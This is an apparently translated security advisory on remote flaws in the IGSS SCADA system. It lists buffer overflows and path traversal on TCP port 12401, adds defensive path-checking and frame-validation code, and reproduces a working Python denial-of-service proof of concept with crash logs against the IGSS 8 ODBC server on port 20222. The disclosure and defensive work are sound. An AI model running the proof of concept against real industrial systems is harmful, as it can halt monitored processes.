Security Research

Security Vulnerability
7T Interactive Graphical SCADA System Malformed Packet Remote Memory Corruption Vulnerability

Published: 2011-02-10
Updated: 2011-03-23

Affected systems:
7-Technologies Interactive Graphical SCADA System 9
7-Technologies Interactive Graphical SCADA System 8
Description:
BUGTRAQ ID: 46310

IGSS is a SCADA system used to monitor industrial processes.

A remote memory corruption vulnerability exists in 7T Interactive Graphical SCADA System when processing malformed packets. A remote attacker can exploit it to execute arbitrary code with administrator privileges and take full control of the affected system, or to cause a denial of service.

1) An input validation error exists in IGSSdataServer.exe when processing certain commands. It can be exploited to read and write arbitrary files via a specially crafted packet containing directory traversal specifiers sent to TCP port 12401.

2) A boundary error exists in IGSSdataServer.exe when processing the "ListAll" command. It can be exploited to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 12401.

3) A boundary error exists in IGSSdataServer.exe when processing the "Write file" command. It can be exploited to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 12401.

4) A boundary error exists in IGSSdataServer.exe when processing the "ReadFile" command. It can be exploited to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 12401.

5) A boundary error exists in IGSSdataServer.exe when processing the "Delete" command. It can be exploited to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 12401.

6) A boundary error exists in IGSSdataServer.exe when processing the "RenameFile" command. It can be exploited to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 12401.

7) A boundary error exists in IGSSdataServer.exe when processing the "FileInfo" command. It can be exploited to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 12401.

8) A boundary error exists in IGSSdataServer.exe when processing the RMS Reports "Add" command. It can be exploited to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 12401.

9) A boundary error exists in IGSSdataServer.exe when processing the RMS Reports "ReadFile" and "Write file" commands. It can be exploited to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 12401.

10) A boundary error exists in IGSSdataServer.exe when processing the RMS Reports "Rename" command. It can be exploited to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 12401.

11) A format string error exists in IGSSdataServer.exe when creating log messages via the "logText()" function in shmemmgr9.dll. It can be exploited to crash the process via a specially crafted RMS Reports "Delete" command sent to TCP port 12401.

12) A boundary error exists in IGSSdataServer.exe when building the SQL request string used to process STDREP update requests. It can be exploited to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 12401.

13) An input validation error exists when processing certain commands. It can be exploited to execute arbitrary programs on the system via a specially crafted packet containing directory traversal specifiers sent to TCP port 12401.
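Items 1 and 13 are classic path traversal: a file name taken from the packet is joined onto a server-side directory without being confined to it. The page does not give the command layout, so the following is only the name check a hardened handler would apply before any ReadFile/Write file/Delete/RenameFile/FileInfo operation. This is an added example, not code from 7-Technologies or from the advisory; BASE_DIR, the function name confine() and the sample names are assumptions. Backslashes are treated as separators because the target runs on Windows, and the code uses posixpath so it behaves the same on any host.

```python
import posixpath
import re

# Assumed base directory for file commands; the real IGSS data directory is
# not named in the advisory.
BASE_DIR = "/srv/igss/data"

_DRIVE = re.compile(r"^[A-Za-z]:")


def confine(base, user_path):
    """Map a client-supplied file name to an absolute path under base.

    Returns the resolved path, or None if the name must be rejected:
    empty names, embedded NUL, absolute paths, drive letters, UNC prefixes,
    and anything whose normalised form escapes base via "..".
    """
    if not user_path or "\x00" in user_path:
        return None
    # Windows accepts either separator, so normalise before any other test;
    # otherwise "..\\" would slip past a check that only looks for "../".
    p = user_path.replace("\\", "/")
    if p.startswith("/") or _DRIVE.match(p):
        return None
    norm = posixpath.normpath(p)
    # After normpath, a leading ".." is the only way left to climb out.
    if norm == "." or norm == ".." or norm.startswith("../"):
        return None
    full = posixpath.normpath(posixpath.join(base, norm))
    # Defence in depth: final containment check on the joined result.
    if not full.startswith(base.rstrip("/") + "/"):
        return None
    return full


# Constructed sample names covering the traversal forms a file command
# could carry; none of these come from the advisory.
SAMPLES = [
    "reports/daily.csv",
    "reports\\..\\daily.csv",
    "..\\..\\..\\Windows\\win.ini",
    "C:\\Windows\\win.ini",
    "/etc/passwd",
    "reports/../../x",
    "a\x00.txt",
]

if __name__ == "__main__":
    for name in SAMPLES:
        verdict = confine(BASE_DIR, name)
        print("%-32r -> %s" % (name, verdict if verdict else "REJECT"))
```

A name that contains ".." but stays inside the base ("reports\\..\\daily.csv") is accepted and resolved to base/daily.csv; the check is on where the path ends up, not on the presence of the string "..". The same function serves item 13 as well: the program name to execute is confined to a fixed directory exactly as a file name would be.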

<*Source: Jeremy Brown
  *>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

Jeremy Brown () provided the following test method. Note that this script targets the IGSS 8 ODBC server (Odbcixv8se.exe, TCP port 20222), a different component from the IGSSdataServer.exe issues on TCP port 12401 listed above:

#!/usr/bin/env python3
# igss.py
# IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS
# Jeremy Brown / jbrown at patchtuesday dot org
# Mar 2011
#
# There are multiple remote uninitialized pointer free conditions in IGSS's ODBC
# server. By sending a specially crafted packet to listening port 20222, it is
# possible to crash the server. Execution of arbitrary code is unlikely.
#
# Note: IGSS uses a 3rd party ODBC driver kit from Dr. DeeBee.
#
# HEAP[Odbcixv8se.exe]: Invalid allocation size - 8899AABB (exceeded 7ffdefff)
# HEAP[Odbcixv8se.exe]: Invalid Address specified to RtlGetUserInfoHeap( 00150000, 00175008 )
# (f10.cf8): Break instruction exception - code 80000003 (first chance)
# eax=00175000 ebx=00175000 ecx=7c91ead5 edx=0102fc55 esi=00150000 edi=00175008
# eip=7c90120e esp=0102fe58 ebp=0102fe5c iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
# ntdll!DbgBreakPoint:
# 7c90120e cc              int     3
# 0:002> g
# HEAP[Odbcixv8se.exe]: Invalid Address specified to RtlGetUserInfoHeap( 00150000, 00175008 )
# (f10.cf8): Break instruction exception - code 80000003 (first chance)
# eax=00175000 ebx=00175000 ecx=7c91ead5 edx=0102fc55 esi=00150000 edi=00175008
# eip=7c90120e esp=0102fe58 ebp=0102fe5c iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
# ntdll!DbgBreakPoint:
# 7c90120e cc              int     3
# 0:002> g
# Heap corruption detected at 00175008
# Heap corruption detected at 00177F78
# Heap corruption detected at 001733D8
# (f10.cf8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00173398 ebx=00000000 ecx=feeefeee edx=001733d8 esi=00173390 edi=00150000
# eip=7c9276fc esp=0102fc34 ebp=0102fd08 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
# ntdll!RtlFreeHeapSlowly+0x392:
# 7c9276fc 8901            mov     dword ptr [ecx],eax  ds:0023:feeefeee=????????
# 0:002> kb
# ChildEBP RetAddr  Args to Child
# 0102fd08 7c96f85a 00150000 50000061 00173398 ntdll!RtlFreeHeapSlowly+0x392
# 0102fd7c 7c94bc4c 00150000 50000061 00173398 ntdll!RtlDebugFreeHeap+0x193
# 0102fe64 7c927573 00150000 40000061 00173398 ntdll!RtlFreeHeapSlowly+0x37
# 0102ff34 7c80fd4f 00150000 00000001 00173398 ntdll!RtlFreeHeap+0xf9
# *** ERROR: Module load completed but symbols could not be loaded for Odbcixv8se.exe
# 0102ff7c 0044531d 00aa001c 0102ffb4 00443abd kernel32!GlobalFree+0xb5
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 0102ff88 00443abd 00173398 00000014 00000016 Odbcixv8se+0x4531d
# 0102ffb4 7c80b729 00000710 00000000 00000000 Odbcixv8se+0x43abd
# 0102ffec 00000000 004436f0 00000710 00000000 kernel32!BaseThreadStart+0x37
#
# feeefeee = freed memory
#
# RtlFeeHeap() takes three arguments (values from the RtlFreeHeap frame above):
# HeapHandle --> 0x150000
# Flags      --> 0x00000001
# HeapBase   --> 0x173398
#
# HeapBase is the pointer to the memory block that is going to be freed.
#
# 0:002> dd 173398
# 00173398  001733d8 -----------------------------
# 001733a8  feeefeee feeefeee feeefeee feeefeee  -
# 001733b8  feeefeee feeefeee feeefeee feeefeee  -
# 001733c8  feeefeee feeefeee feeefeee feeefeee  -
# 001733d8  feeefeee feeefeee feeefeee feeefeee <-
# 001733e8  feeefeee feeefeee feeefeee feeefeee
# 001733f8  feeefeee feeefeee feeefeee feeefeee
# 00173408  feeefeee feeefeee feeefeee feeefeee
#
# In this example, the pointer to free happens to point to free memory.
#
# Tested IGSS 8 (Odbcixv8se.exe version 10299) on Windows
#
# Fixed version: IGSS 8 (Odbcixv8se.exe version 11003)
# http://www.syware.com/download/drdeebee/gold_bug.txt
#

import sys
import socket

# Session setup request: 4-byte big-endian length (0x34 = 52 bytes follow),
# then a block carrying the data source name "IGSS32v8 ODBC Network DS".
req_1 = (
    b"\x00\x00\x00\x34"
    b"\x02\x00\x00\x00\x02\x00\x00\x00\x02\x2e\x00\x00\x00\x00\x19\x49"
    b"\x47\x53\x53\x33\x32\x76\x38\x20\x4f\x44\x42\x43\x20\x4e\x65\x74"
    b"\x77\x6f\x72\x6b\x20\x44\x53\x00\x00\x00\x00\x02\x20\x00\x00\x00"
    b"\x00\x02\x20\x00"
)

# Trigger request: the declared length covers the switch code plus the
# 254-byte query; the 4 trailing "test" bytes are what the server mishandles.
req_2 = (
    b"\x00\x00\x00\xff"      # length
    + b"\x16"                # switch code
    + b"\x77" * 254          # begin query here
    + b"\x88\x99\xaa\xbb"    # test
)


def main():
    if len(sys.argv) != 2:
        print("Usage: %s <target>" % sys.argv[0])
        sys.exit(0)

    target = sys.argv[1]
    port = 20222

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target, port))
    sock.settimeout(1)

    sock.sendall(req_1)
    try:
        resp = sock.recv(1024)
        print("resp_1 = %s\n" % resp.hex())
    except OSError:        # timeout or connection reset: the server may already be gone
        pass

    sock.sendall(req_2)
    try:
        resp = sock.recv(1024)
        print("resp_2 = %s\n" % resp.hex())
    except OSError:
        pass

    sock.close()


if __name__ == "__main__":
    main()
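The framing visible in the two requests is a 4-byte big-endian length followed by that many bytes of payload (req_1 declares 0x34 and is followed by exactly 52 bytes). In req_2 the four bytes the author labels "test" sit past the 255 bytes the length field declares, so a receiver that loops on the length prefix reads them as the next frame's length, 0x8899AABB, which is the "Invalid allocation size" in the debugger output above; that reading is my inference from the page's data, not a statement by the author. The following is an added example, not part of the PoC or of the IGSS software: it splits a captured stream into frames and flags a declared length the allocator could never satisfy, then shows the hardened receive step that rejects such a frame before allocating. MAX_FRAME, the function names and the use of the two PoC requests as sample input are assumptions; the server's real limit is not given on the page.

```python
import io
import struct

# Framing seen in the PoC: a 4-byte big-endian length, then that many payload
# bytes, the first of which is the "switch code".
HDR_LEN = 4
# Assumed cap for a hardened receiver. The real server's limit is not
# documented; the point is that a value near the Windows heap ceiling seen in
# the crash log (0x7ffdefff) is never a legitimate request size.
MAX_FRAME = 64 * 1024

# The two PoC requests, re-typed here as sample input.
REQ_1 = (
    b"\x00\x00\x00\x34"
    b"\x02\x00\x00\x00\x02\x00\x00\x00\x02\x2e\x00\x00\x00\x00\x19\x49"
    b"\x47\x53\x53\x33\x32\x76\x38\x20\x4f\x44\x42\x43\x20\x4e\x65\x74"
    b"\x77\x6f\x72\x6b\x20\x44\x53\x00\x00\x00\x00\x02\x20\x00\x00\x00"
    b"\x00\x02\x20\x00"
)
REQ_2 = b"\x00\x00\x00\xff" + b"\x16" + b"\x77" * 254 + b"\x88\x99\xaa\xbb"


def split_frames(stream):
    """Walk a captured byte stream the way a length-prefix reader would.

    Returns a list of (status, declared_length, payload). status is "ok" for a
    complete frame, "oversized" when the declared length exceeds MAX_FRAME
    (the value the unpatched server hands straight to the allocator) and
    "truncated" when fewer bytes than declared are present. Parsing stops at
    the first bad frame because nothing after it can be trusted.
    """
    frames = []
    off = 0
    while off + HDR_LEN <= len(stream):
        (length,) = struct.unpack(">I", stream[off:off + HDR_LEN])
        payload = stream[off + HDR_LEN:off + HDR_LEN + length]
        if length > MAX_FRAME:
            frames.append(("oversized", length, payload))
            break
        if len(payload) < length:
            frames.append(("truncated", length, payload))
            break
        frames.append(("ok", length, payload))
        off += HDR_LEN + length
    return frames


def classify(stream):
    """One-word verdict for a captured request stream, for use in a monitor."""
    statuses = [s for s, _, _ in split_frames(stream)]
    if "oversized" in statuses:
        return "oversized"
    if "truncated" in statuses:
        return "truncated"
    return "ok"


def recv_frame(reader):
    """Hardened receive step: validate the length before allocating anything.

    reader is any object with read(n) (socket.makefile("rb") in practice,
    io.BytesIO here). Returns the payload, None at a clean end of stream, and
    raises ValueError rather than trusting an absurd or short frame.
    """
    hdr = reader.read(HDR_LEN)
    if not hdr:
        return None
    if len(hdr) < HDR_LEN:
        raise ValueError("short header")
    (length,) = struct.unpack(">I", hdr)
    if length == 0 or length > MAX_FRAME:
        raise ValueError("refusing frame of declared length 0x%x" % length)
    payload = reader.read(length)
    if len(payload) != length:
        raise ValueError("frame truncated: wanted %d got %d" % (length, len(payload)))
    return payload


def drain(stream):
    """Run recv_frame over a whole captured stream; returns (payloads, error)."""
    reader = io.BytesIO(stream)
    payloads = []
    try:
        while True:
            p = recv_frame(reader)
            if p is None:
                return payloads, None
            payloads.append(p)
    except ValueError as e:
        return payloads, str(e)


if __name__ == "__main__":
    for name, data in (("req_1", REQ_1), ("req_2", REQ_2)):
        for status, length, payload in split_frames(data):
            print("%s: %-9s len=0x%x payload=%d bytes" % (name, status, length, len(payload)))
    payloads, err = drain(REQ_2)
    print("hardened receiver accepted %d frame(s), then: %s" % (len(payloads), err))
```

Run against req_1 the splitter yields a single "ok" frame; against req_2 it yields the 255-byte query and then an "oversized" header of 0x8899AABB, and the hardened receiver accepts the query and refuses the second header instead of attempting the allocation. A network monitor in front of port 20222 can apply classify() to each client stream; the "oversized" verdict is the signature of this PoC, and "truncated" catches a client that closes mid-frame.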

Recommendation:
Vendor patch:

7-Technologies
--------------
The vendor has released an upgrade patch to fix this security issue. Please download it from the vendor's homepage:

http://www.igss.com/

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.